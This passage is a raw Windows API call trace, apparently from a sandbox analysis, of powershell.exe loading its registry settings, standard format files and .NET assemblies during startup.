	[0577.284] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed2ec, lpData=0x0, lpcbData=0x1ed2e8*=0x0 | out: lpType=0x1ed2ec*=0x1, lpData=0x0, lpcbData=0x1ed2e8*=0x56) returned 0x0
	[0577.284] CoTaskMemAlloc (cb=0x5a) returned 0x3f79e0
	[0577.284] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed2bc, lpData=0x3f79e0, lpcbData=0x1ed2b8*=0x56 | out: lpType=0x1ed2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed2b8*=0x56) returned 0x0
	[0577.284] CoTaskMemFree (pv=0x3f79e0) 
	[0577.284] RegCloseKey (hKey=0x324) returned 0x0
	[0577.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0577.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0582.604] VirtualQuery (in: lpAddress=0x1ec050, lpBuffer=0x1ecf10, dwLength=0x30 | out: lpBuffer=0x1ecf10*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0582.618] VirtualQuery (in: lpAddress=0x1ec050, lpBuffer=0x1ecf10, dwLength=0x30 | out: lpBuffer=0x1ecf10*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0587.517] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0587.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.518] CoTaskMemFree (pv=0x40a230) 
	[0587.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed508 | out: phkResult=0x1ed508*=0x324) returned 0x0
	[0587.543] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed51c, lpData=0x0, lpcbData=0x1ed518*=0x0 | out: lpType=0x1ed51c*=0x1, lpData=0x0, lpcbData=0x1ed518*=0x74) returned 0x0
	[0587.543] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed48c, lpData=0x0, lpcbData=0x1ed488*=0x0 | out: lpType=0x1ed48c*=0x1, lpData=0x0, lpcbData=0x1ed488*=0x74) returned 0x0
	[0587.544] CoTaskMemAlloc (cb=0x78) returned 0x3a0a60
	[0587.544] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1ed45c, lpData=0x3a0a60, lpcbData=0x1ed458*=0x74 | out: lpType=0x1ed45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed458*=0x74) returned 0x0
	[0587.544] CoTaskMemFree (pv=0x3a0a60) 
	[0587.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0587.544] SetErrorMode (uMode=0x1) returned 0x1
	[0587.544] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed3e0 | out: lpFileInformation=0x1ed3e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0587.544] SetErrorMode (uMode=0x1) returned 0x1
	[0587.545] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0587.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.546] CoTaskMemFree (pv=0x40a230) 
	[0587.551] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0587.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.552] CoTaskMemFree (pv=0x40a230) 
	[0587.552] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0587.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.552] CoTaskMemFree (pv=0x40a230) 
	[0587.553] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0587.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0587.553] CoTaskMemFree (pv=0x40a230) 
	[0587.553] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0587.553] GetFileType (hFile=0x2f4) returned 0x1
	[0587.553] SetErrorMode (uMode=0x1) returned 0x1
	[0587.553] GetFileType (hFile=0x2f4) returned 0x1
	[0587.554] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.558] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.558] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.559] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.559] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.560] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0587.560] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x9e2, lpOverlapped=0x0) returned 1
	[0587.560] ReadFile (in: hFile=0x2f4, lpBuffer=0x3389722, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3389722*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0587.560] ReadFile (in: hFile=0x2f4, lpBuffer=0x338a1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x338a1d8*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0587.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x2f4) returned 0x0
	[0587.561] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0587.561] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a1890
	[0587.561] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a1890, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0587.561] CoTaskMemFree (pv=0x1b9a1890) 
	[0587.561] RegCloseKey (hKey=0x2f4) returned 0x0
	[0587.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0587.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0587.568] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xafdce180, Data2=0x763a, Data3=0x461d, Data4=([0]=0x85, [1]=0x69, [2]=0x1f, [3]=0xef, [4]=0xbb, [5]=0x51, [6]=0x36, [7]=0x6d))) returned 0x0
	[0587.578] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x1f0b5d23, Data2=0xed56, Data3=0x4197, Data4=([0]=0x8b, [1]=0x2f, [2]=0xa5, [3]=0xe, [4]=0xd8, [5]=0x4e, [6]=0x7d, [7]=0x39))) returned 0x0
	[0587.580] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0587.580] GetFileType (hFile=0x2f4) returned 0x1
	[0587.580] SetErrorMode (uMode=0x1) returned 0x1
	[0587.580] GetFileType (hFile=0x2f4) returned 0x1
	[0587.580] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.575] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.576] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.577] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.577] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.578] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0xfb2, lpOverlapped=0x0) returned 1
	[0589.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b445a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b445a*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0589.579] ReadFile (in: hFile=0x2f4, lpBuffer=0x33b4d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x33b4d40*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0589.579] CloseHandle (hObject=0x2f4) returned 1
	[0589.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0589.579] SetErrorMode (uMode=0x1) returned 0x1
	[0589.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0589.579] SetErrorMode (uMode=0x1) returned 0x1
	[0589.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0589.580] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x2f4) returned 0x0
	[0589.580] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0589.580] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a1c80
	[0589.580] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a1c80, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0589.580] CoTaskMemFree (pv=0x1b9a1c80) 
	[0589.580] RegCloseKey (hKey=0x2f4) returned 0x0
	[0589.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0589.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0589.583] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x48c660d6, Data2=0x6083, Data3=0x4878, Data4=([0]=0x86, [1]=0x9f, [2]=0xda, [3]=0x3e, [4]=0xc5, [5]=0x7a, [6]=0x19, [7]=0x34))) returned 0x0
	[0589.585] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x633c9e62, Data2=0xb226, Data3=0x44c6, Data4=([0]=0x89, [1]=0x5, [2]=0x4d, [3]=0x86, [4]=0x8e, [5]=0x6e, [6]=0x30, [7]=0xfc))) returned 0x0
	[0589.586] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd1fc0723, Data2=0xb3d, Data3=0x40e6, Data4=([0]=0xbf, [1]=0x3b, [2]=0xce, [3]=0x1b, [4]=0x4, [5]=0xf3, [6]=0xf8, [7]=0x51))) returned 0x0
	[0589.587] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3c6d6516, Data2=0x6f2d, Data3=0x474d, Data4=([0]=0xb4, [1]=0xcc, [2]=0x3b, [3]=0x2e, [4]=0x47, [5]=0x2c, [6]=0x54, [7]=0x1f))) returned 0x0
	[0589.588] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x33699ae1, Data2=0xe0, Data3=0x4948, Data4=([0]=0xbf, [1]=0x8c, [2]=0x43, [3]=0xd7, [4]=0x51, [5]=0x76, [6]=0xcb, [7]=0xf0))) returned 0x0
	[0589.588] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xad6bc225, Data2=0x2d6c, Data3=0x41bf, Data4=([0]=0x82, [1]=0x8c, [2]=0xc9, [3]=0xc5, [4]=0xfe, [5]=0x14, [6]=0x31, [7]=0x9a))) returned 0x0
	[0589.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0589.589] SetErrorMode (uMode=0x1) returned 0x1
	[0589.589] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0589.590] GetFileType (hFile=0x2f4) returned 0x1
	[0589.590] SetErrorMode (uMode=0x1) returned 0x1
	[0589.590] GetFileType (hFile=0x2f4) returned 0x1
	[0589.590] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.593] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.594] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.594] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.596] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.596] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0589.596] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0xaca, lpOverlapped=0x0) returned 1
	[0589.596] ReadFile (in: hFile=0x2f4, lpBuffer=0x34000d2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x34000d2*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0589.596] ReadFile (in: hFile=0x2f4, lpBuffer=0x3400aa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3400aa0*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0589.597] CloseHandle (hObject=0x2f4) returned 1
	[0589.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0589.597] SetErrorMode (uMode=0x1) returned 0x1
	[0589.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0589.597] SetErrorMode (uMode=0x1) returned 0x1
	[0589.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0589.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x2f4) returned 0x0
	[0589.598] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0589.598] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a1c80
	[0589.598] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a1c80, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0589.598] CoTaskMemFree (pv=0x1b9a1c80) 
	[0589.598] RegCloseKey (hKey=0x2f4) returned 0x0
	[0589.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0589.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0589.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0589.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0589.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0590.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0590.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
